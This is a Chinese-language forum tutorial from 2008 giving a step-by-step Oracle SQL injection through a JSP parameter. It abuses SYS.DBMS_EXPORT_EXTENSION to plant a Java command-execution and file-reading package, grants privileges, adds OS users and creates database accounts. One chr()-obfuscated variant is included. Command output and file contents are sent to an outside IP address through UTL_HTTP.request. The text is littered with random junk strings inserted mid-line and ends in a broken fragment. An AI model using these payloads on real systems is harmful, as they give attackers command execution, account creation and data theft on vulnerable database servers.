
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在 web 上的 SQL*Plus 中执行的，在 web 注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

7 y0 Z8 A; a4 @, C. E  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)   x/ f$ M4 _- R# h3 P8 w
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长，可能要用 POST 提交。
以下是各个步骤:
1. 创建包
" \, D7 |7 J. @( u( P4 q通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
# I) M/ s, Z5 ]/xxx.jsp?id=1 and '1'<>'a'||( : _% `: O/ x- Q7 [7 Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; K! N6 c) ?& H1 o( e5 U4 t
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
# D9 l3 d* ?: ~* b6 }( Z( _new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: x; ]% R0 ~8 Y: U
}'''';END;'';END;--','SYS',0,'1',0) from dual ( D5 A2 S- i) D$ r# y
) 2 f( s9 f% P) s4 }1 ]# g
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
' h' ?8 B  [# r7 r/xxx.jsp?id=1 and '1'<>'a'||(
; P6 f$ ]: `5 h$ W- s; }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 \$ N7 c9 ~- p) M6 |
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(- E, B5 y& ^& m$ e8 C; M5 ^
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}! I. b/ W: j" J$ U$ A0 a: @
}'''';END;'';END;--','SYS',0,'1',0) from dual
2 w$ `' H" O7 s- L8 G2 Q) / ]5 R$ y, }: u* W! P% E
同时把后面步骤提到的对 readFile() 的处理语句去掉。
------------------------------
2. 赋 Java 权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. 创建函数
& q. s* q6 `1 b$ z5 Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 ^' v9 k) |5 _  z' d1 j1 G( r" rcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
& j% @, F; ^4 J& m5 p) Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 X0 g  T: d/ U% b5 @create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. 赋 public 执行函数的权限
$ o# i1 ]" w2 a+ E. }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual9 _. S( E- b* [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. 测试上面的几步是否成功
/ ^$ D, p% \0 eand '1'<>'11'||( : K  v$ O) r2 r( Q; j
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' + K0 \  v7 {$ K6 `# B( R& f
) & o: F8 ~* q6 Q6 }+ t
and '1'<>( * S; C3 v% A0 A8 o, _# o
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
2 |1 m+ h* R) _( E% \6 @)
6. 执行命令:
! {: Y  p& @3 f3 [  g1 s/xxx.jsp?id=1 and '1'<>(
# F0 V9 N; G, v7 |select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 6 B2 t7 u% D  A' o+ v  C

, X8 \0 {: O' ]+ v2 y3 K( y) 0 O2 G7 J8 T/ w- _
/xxx.jsp?id=1 and '1'<>( # j/ w& h! z, V
select  sys.LinxReadFile('c:/boot.ini') from dual/ u+ I3 e6 X+ Q

3 `; _4 G& q2 a6 y$ {)
0 x7 w. t) X& j4 A  
注意 sys.LinxReadFile() 返回的是 varchar 类型，不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>( 1 K' H. J0 I1 H. M5 d2 O$ X
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual  x9 _- r( T/ y9 W  q. f
)
( k, P* @2 I+ |! X3 |5 w4 J/xxx.jsp?id=1 and '1'<>( ; N2 I% {; ?# v- A0 F
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
# \+ \; B0 I( z, B0 E) - E) G: @( c7 f, _6 s1 {- @
注意: 用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则会无法提交 HTTP request。用 utl_encode.base64_encode 也可以。
--------------------
6. 内部变化
通过以下命令可以查看 all_objects 表的改变:
9 N7 p. ]9 c( w! ?5 h) {, u. X' qselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  w/ r* {' H* J/ ]4 e! \; K: X' N
7. 删除我们创建的函数
( j' R6 q4 Y, A! {4 v0 h  H' yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 c! C. }3 F% l/ C+ ydrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
: B! p; _" t0 O; E( f# _# }linx
& ~' C# d* x- f9 z124829445
% h) I  z, F6 u/ v' d$ I' W2008.1.12
. u: [) v3 b7 |7 F3 Elinyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 d2 x- F% f; N& s3 s- Z  u; [
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),& O/ ]$ Z# Y4 e9 \) }' b
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual / C6 i) O/ S2 h* r+ ?" u& v
确定漏洞存在:
1<>( * E% B3 z. F! ^0 B
select user_id from all_users where username='LINXSQL' 0 n8 O' t* @) g' l, Q. \
) - w0 [0 k4 k& k& |0 f0 e! S
给 linxsql 连接权限:
4 i5 n/ j, \$ F; I/ Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ r9 L8 m( {/ I" A! GGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual % X; `# Y7 S+ Z# C; P8 c; i& T
删除帐号:
0 c0 c0 G, P$ t$ x" Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 ?# G5 q" i) g3 h0 E2 ldrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual & |5 I( o$ r* ^( e; {  n( T
======================
以下方法创建一个可以执行多语句的函数 Linx_query()，执行成功的话返回数值 "1"，但权限是继承的，可能仅仅是 public 权限，作用似乎不大；真的要用的话可以考虑 grant dba to 当前的 User:
/ k& e3 I$ R# M1 D( Z: x1.jsp?id=1 and '1'<>(
( R6 x, t5 w) [2 n+ s/ E4 sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 i6 N, X( i, T) zcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual  Y7 Y! a6 S7 _3 j- f, G3 }& M
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE4 z1 Y$ A  w7 n. f1 W
 )/ {. s/ d  p; z3 K4 W$ I7 m

; o  Z0 m: ?5 e  U9 Y* b5 _# C
4 O- \( E6 j/ n8 k5 J! _7 q7 E  S- x6 u- q7 p